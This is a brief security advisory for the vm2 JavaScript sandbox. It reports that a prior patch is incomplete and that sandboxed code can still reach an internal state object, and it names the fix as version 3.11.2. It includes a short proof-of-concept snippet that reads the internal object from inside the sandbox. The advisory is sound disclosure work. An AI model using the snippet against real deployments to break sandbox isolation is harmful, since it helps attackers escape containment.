MEDIUM 5.3

GHSA-2cm2-m3w5-gp2f

vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`

Details

### Summary

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

### Details

It is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.

### PoC

```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL'] `)); ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / vm2

Introduced in: 0 Fixed in: 3.11.2

Fix npm install vm2@3.11.2

References

https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f [WEB]
https://github.com/patriksimek/vm2 [PACKAGE]
https://github.com/patriksimek/vm2/releases/tag/v3.11.2 [WEB]